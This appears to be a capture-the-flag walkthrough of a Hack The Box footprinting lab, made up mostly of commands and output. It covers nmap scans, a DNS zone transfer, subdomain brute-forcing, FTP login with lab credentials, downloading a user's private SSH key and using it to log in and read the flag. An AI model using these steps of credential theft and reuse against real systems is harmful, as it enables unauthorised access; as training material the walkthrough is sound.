Footprinting Lab - Easy

Nmap Scan

┌─[root@parrot]─[/home/z3tssu]
└──╼ nmap 10.129.122.64 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-07 20:12 +04
Nmap scan report for 10.129.122.64
Host is up (0.30s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
53/tcp   open  domain
2121/tcp open  ccproxy-ftp

Nmap done: 1 IP address (1 host up) scanned in 36.13 seconds

┌─[✗]─[root@parrot]─[/home/z3tssu]
└──╼ nmap 10.129.122.64 -sV -sC -p21,22,53,2121
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-07 20:16 +04
Nmap scan report for 10.129.122.64
Host is up (0.29s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.122.64]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
|   256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_  256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
2121/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Ceil's FTP) [10.129.122.64]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.94SVN%I=7%D=3/7%Time=67CB1BF2%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,9C,"220\x20ProFTPD\x20Server\x20\(ftp\.int\.inlanefreight\.h
SF:tb\)\x20\[10\.129\.122\.64\]\r\n500\x20Invalid\x20command:\x20try\x20be
SF:ing\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x
SF:20more\x20creative\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2121-TCP:V=7.94SVN%I=7%D=3/7%Time=67CB1BF2%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,8D,"220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20\[10\
SF:.129\.122\.64\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x
SF:20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
SF:ative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.45 seconds

Dig zone transfer

┌─[root@parrot]─[/home/z3tssu]
└──╼ #dig axfr inlanefreight.htb @10.129.75.47

; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr inlanefreight.htb @10.129.75.47
;; global options: +cmd
inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.	604800	IN	TXT	"MS=ms97310371"
inlanefreight.htb.	604800	IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
inlanefreight.htb.	604800	IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
inlanefreight.htb.	604800	IN	NS	ns.inlanefreight.htb.
app.inlanefreight.htb.	604800	IN	A	10.129.18.15
internal.inlanefreight.htb. 604800 IN	A	10.129.1.6
mail1.inlanefreight.htb. 604800	IN	A	10.129.18.201
ns.inlanefreight.htb.	604800	IN	A	10.129.34.136
inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 319 msec
;; SERVER: 10.129.75.47#53(10.129.75.47) (TCP)
;; WHEN: Sat Mar 08 17:09:16 +04 2025
;; XFR size: 10 records (messages 1, bytes 540)

Add the discovered Sub domain to etc/hosts

Perform DNS enumeration using dnsenum

dnsenum --dnsserver STMIP --enum -p 0 -s 0 -f /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt internal.inlanefreight.htb

-----   internal.inlanefreight.htb   -----


Host's addresses:
__________________



Name Servers:
______________

ns.inlanefreight.htb.                    604800   IN    A        10.129.34.136


Mail (MX) Servers:
___________________



Trying Zone Transfers and getting Bind Versions:
_________________________________________________

unresolvable name: ns.inlanefreight.htb at /usr/bin/dnsenum line 900 thread 2.

Trying Zone Transfer for internal.inlanefreight.htb on ns.inlanefreight.htb ... 
AXFR record query failed: no nameservers


Brute forcing with /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:
________________________________________________________________________________________________

ftp.internal.inlanefreight.htb.          604800   IN    A         127.0.0.1
ns.internal.inlanefreight.htb.           604800   IN    A        10.129.34.136
vpn.internal.inlanefreight.htb.          604800   IN    A        10.129.1.6
mail1.internal.inlanefreight.htb.        604800   IN    A        10.129.18.200
wsus.internal.inlanefreight.htb.         604800   IN    A        10.129.18.2
ws1.internal.inlanefreight.htb.          604800   IN    A        10.129.1.34

Add the discovered DNS record to the /etc/hosts

oot@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #cat /etc/hosts
# Host addresses
127.0.0.1  localhost
127.0.1.1  parrot
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.129.75.47	internal.inlanefreight.htb
10.129.75.47	ftp.internal.inlanefreight.htb
10.129.42.249 gettingstarted.htb
# Others
┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]

nmap ftp.internal.inlanefreight.htb

┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #nmap -T4 ftp.internal.inlanefreight.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-08 17:31 +04
Nmap scan report for ftp.internal.inlanefreight.htb (10.129.75.47)
Host is up (0.33s latency).
rDNS record for 10.129.75.47: internal.inlanefreight.htb
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
53/tcp   open  domain
2121/tcp open  ccproxy-ftp

Nmap done: 1 IP address (1 host up) scanned in 2.82 second

FTP into ftp.internal.inlanefreight.htb on port 2121

need to recall the details written in the assessment's lab scenario. Specifically, that the credentials ceil:qwer1234

┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #ftp ftp.internal.inlanefreight.htb 2121
Connected to ftp.internal.inlanefreight.htb.
220 ProFTPD Server (Ceil's FTP) [10.129.75.47]
Name (ftp.internal.inlanefreight.htb:z3tssu): ceil
331 Password required for ceil
Password: 
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.

Enumerate the Directories to finds files

ftp> ls -la
229 Entering Extended Passive Mode (|||4766|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 ..
-rw-------   1 ceil     ceil          294 Nov 10  2021 .bash_history
-rw-r--r--   1 ceil     ceil          220 Nov 10  2021 .bash_logout
-rw-r--r--   1 ceil     ceil         3771 Nov 10  2021 .bashrc
drwx------   2 ceil     ceil         4096 Nov 10  2021 .cache
-rw-r--r--   1 ceil     ceil          807 Nov 10  2021 .profile
drwx------   2 ceil     ceil         4096 Nov 10  2021 .ssh
-rw-------   1 ceil     ceil          759 Nov 10  2021 .viminfo
226 Transfer complete
ftp> cd .ssh
250 CWD command successful
ftp> ls -la
229 Entering Extended Passive Mode (|||48089|)
150 Opening ASCII mode data connection for file list
drwx------   2 ceil     ceil         4096 Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 ..
-rw-rw-r--   1 ceil     ceil          738 Nov 10  2021 authorized_keys
-rw-------   1 ceil     ceil         3381 Nov 10  2021 id_rsa
-rw-r--r--   1 ceil     ceil          738 Nov 10  2021 id_rsa.pub
226 Transfer complete
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||63095|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |*************************************************|  3381       16.96 MiB/s    00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (8.33 KiB/s)

Accessing server via SSH with found id_rsa keys

After you ahve downlaoded the id_rsa from the server, it will be stored on that attacker machine

Changing permission of the id_rsa

chmod 600 id_rsa

Accessing server via SSH and user Ceil

┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #ssh ceil@10.129.75.47 -i id_rsa
The authenticity of host '10.129.75.47 (10.129.75.47)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.75.47' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-90-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 08 Mar 2025 01:42:12 PM UTC

  System load:  0.0               Processes:               161
  Usage of /:   86.7% of 3.87GB   Users logged in:         0
  Memory usage: 12%               IPv4 address for ens192: 10.129.75.47
  Swap usage:   0%

  => / is using 86.7% of 3.87GB


118 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Nov 10 05:48:02 2021 from 10.10.14.20
ceil@NIXEASY:~$

Getting the Flag

ceil@NIXEASY:~$ ls -la
total 36
drwxr-xr-x 4 ceil ceil 4096 Nov 10  2021 .
drwxr-xr-x 5 root root 4096 Nov 10  2021 ..
-rw------- 1 ceil ceil  294 Nov 10  2021 .bash_history
-rw-r--r-- 1 ceil ceil  220 Nov 10  2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10  2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10  2021 .cache
-rw-r--r-- 1 ceil ceil  807 Nov 10  2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10  2021 .ssh
-rw------- 1 ceil ceil  759 Nov 10  2021 .viminfo
ceil@NIXEASY:~$ pwd
/home/ceil
ceil@NIXEASY:~$ cd /home
ceil@NIXEASY:/home$ ls
ceil  cry0l1t3  flag
ceil@NIXEASY:/home$ cd flag
ceil@NIXEASY:/home/flag$ ls
flag.txt
ceil@NIXEASY:/home/flag$ cat flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
ceil@NIXEASY:/home/flag$

PreviousHTB NextFootprinting Lab - Medium

Last updated 11 months ago

hashtagAccessing server via SSH with found id_rsa keys

hashtagChanging permission of the id_rsa

hashtagAccessing server via SSH and user Ceil

hashtagGetting the Flag

Accessing server via SSH with found id_rsa keys

Changing permission of the id_rsa

Accessing server via SSH and user Ceil

Getting the Flag